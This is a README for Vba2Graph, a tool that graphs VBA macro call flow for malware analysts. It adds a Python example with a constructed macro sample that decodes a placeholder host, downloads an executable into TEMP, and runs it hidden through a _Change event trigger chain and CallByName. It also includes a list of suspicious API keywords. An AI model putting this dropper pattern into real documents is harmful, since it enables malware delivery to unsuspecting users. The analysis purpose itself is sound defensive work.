Vba2Graph: a tool for security researchers that generates a VBA call graph for easier analysis of malicious documents.
It allows quick analysis of malicious macros and makes their execution flow easy to understand.
Developed by @MalwareCantFly.
Features
- Keyword highlighting
- VBA Properties support
- External function declaration support (Declare statements)
- Support for tricky macros that use “_Change” event handlers as execution triggers
- Fancy color schemes
Pros
✓ Pretty fast
✓ Works well on most malicious macros observed in the wild
Cons
✗ Static analysis only (dynamically resolved calls, e.g. a target name passed as a string to CallByName, will not be recognized)
Examples
Example 1:
Trickbot downloader – uses a form object's Resize event as the initial trigger, followed by TextBox_Change triggers.
Example 2:
Installation
Install oletools:
https://github.com/decalage2/oletools/wiki/Install
Install Python Requirements
pip install -r requirements.txt
Install Graphviz
For Windows
Install Graphviz msi:
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
Add the Graphviz bin directory (the one containing “dot.exe”) to the PATH env variable, or for the current session just (adjust the path to your installed version):
set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin
For Mac
brew install graphviz
Ubuntu
sudo apt-get install graphviz
Arch
sudo pacman -S graphviz
Usage (All Platforms)
Pipe olevba output straight into vba2graph:
olevba malicious.doc | python vba2graph.py -c 1
Or run it on a saved olevba output file and write results to a folder:
python vba2graph.py -i olevba_output.bas -o output_folder
Output
You’ll get 3 folders in your output folder:
- png: the actual graph image you are looking for
- dot: the dot file which was used to create the graph image
- bas: the VBA functions code that was recognized by the script (for debugging)
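The following Python script is an added example, not vba2graph's own code, showing in miniature what the dot and bas outputs represent: it extracts Sub/Function/Property bodies and Declare'd externals from VBA source, links callers to callees, treats an assignment to a control's Text/Value as an edge to that control's _Change handler (the trigger trick from the Features list and Example 1), highlights suspicious keywords, and emits Graphviz DOT. The VBA sample is constructed (not real malware) to mirror the Example 1 trigger chain and adds a CallByName call so the graph also shows the static-analysis limitation listed under Cons. The regexes, keyword list, colours and procedure names are this example's own choices; it is not a full VBA parser.

```python
import re

# Constructed sample VBA (not real malware), modelled on the Example 1 trigger
# chain: a Resize event writes into a TextBox and the TextBox's _Change handler
# runs the payload. Document_Open uses CallByName with a string target so the
# graph also shows what purely static analysis misses.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub UserForm_Resize()
    TextBox1.Text = Decode("moc.elpmaxe")
End Sub

Private Sub TextBox1_Change()
    Launch TextBox1.Text
End Sub

Private Function Decode(s As String) As String
    Decode = StrReverse(s)
End Function

Private Sub Launch(host As String)
    Dim sh As Object
    URLDownloadToFile 0, "http://" & host & "/a.exe", Environ("TEMP") & "\a.exe", 0, 0
    Set sh = CreateObject("WScript.Shell")
    sh.Run Environ("TEMP") & "\a.exe", 0
End Sub

Private Sub Document_Open()
    CallByName Me, "Launch", VbMethod, "example.com"
End Sub
'''

PROC_RE = re.compile(r'^[ \t]*(?:(?:Public|Private|Friend)\s+)?(?:Static\s+)?'
                     r'(?:Sub|Function|Property\s+(?:Get|Let|Set))\s+(\w+)', re.I | re.M)
DECL_RE = re.compile(r'^[ \t]*(?:(?:Public|Private)\s+)?Declare\s+(?:PtrSafe\s+)?'
                     r'(?:Sub|Function)\s+(\w+)', re.I | re.M)
END_RE = re.compile(r'^[ \t]*End\s+(?:Sub|Function|Property)\b', re.I | re.M)
STRING_RE = re.compile(r'"(?:[^"]|"")*"')
# Procedure names the host application calls on its own (entry points / triggers).
TRIGGER_RE = re.compile(r'_(Change|Resize|Open|Close|Click|Activate|Initialize|Layout)$'
                        r'|^Auto_?(Open|Exec|Close)$', re.I)
# Suspicious API names to highlight; this list is the example's own choice.
KEYWORDS = ('Shell', 'WScript.Shell', 'CreateObject', 'GetObject', 'CallByName',
            'URLDownloadToFile', 'Environ', 'Kill', 'PowerShell', 'Run')


def build_call_graph(vba):
    """Return (procs, edges, flags).

    procs: name -> body text (external Declares get an empty body)
    edges: {(caller, callee, kind)} where kind is 'call' or 'trigger'
    flags: name -> sorted suspicious keywords found in that body
    """
    procs = {}
    for m in PROC_RE.finditer(vba):
        end = END_RE.search(vba, m.end())
        procs[m.group(1)] = vba[m.end():end.start() if end else len(vba)]
    for m in DECL_RE.finditer(vba):
        procs.setdefault(m.group(1), '')

    edges, flags = set(), {}
    for caller, body in procs.items():
        code = STRING_RE.sub('""', body)  # a name inside a string literal is not a call
        for callee in procs:
            if callee != caller and re.search(r'(?<![.\w])%s\b' % re.escape(callee), code, re.I):
                edges.add((caller, callee, 'call'))
        # Assigning a control's Text/Value fires its _Change handler: a hidden edge.
        for ctl in re.findall(r'\b(\w+)\.(?:Text|Value)[ \t]*=', code):
            for name in procs:
                if name.lower() == (ctl + '_Change').lower():
                    edges.add((caller, name, 'trigger'))
        kws = sorted(k for k in KEYWORDS if re.search(r'\b%s\b' % re.escape(k), body, re.I))
        if kws:
            flags[caller] = kws
    return procs, edges, flags


def to_dot(procs, edges, flags):
    """Render the graph as Graphviz DOT (then: dot -Tpng graph.dot -o graph.png)."""
    out = ['digraph vba {', '  node [shape=box];']
    for name in procs:
        attrs = []
        if TRIGGER_RE.search(name):
            attrs.append('color=red')  # execution trigger / entry point
        if name in flags:
            attrs += ['style=filled', 'fillcolor=orange',
                      'label="%s\\n%s"' % (name, ', '.join(flags[name]))]
        out.append('  "%s"%s;' % (name, ' [%s]' % ' '.join(attrs) if attrs else ''))
    for caller, callee, kind in sorted(edges):
        style = ' [style=dashed label="triggers"]' if kind == 'trigger' else ''
        out.append('  "%s" -> "%s"%s;' % (caller, callee, style))
    out.append('}')
    return '\n'.join(out)


if __name__ == '__main__':
    print(to_dot(*build_call_graph(SAMPLE_VBA)))
```

The DOT text is the kind of content the dot folder holds; rendering it with dot gives the png. In the sample, the red entry points and the dashed "triggers" edge make the Resize → TextBox1_Change → Launch chain readable, while Document_Open shows up as a flagged node with no outgoing edge: the string target of CallByName is invisible to static analysis, which is exactly the limitation listed under Cons.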
Batch Processing
Mac/Linux:
The attached batch.sh script runs olevba and vba2graph on every document in an input folder of malicious docs.
It deletes the output directory before running, so use it with caution.
Download Vba2Graph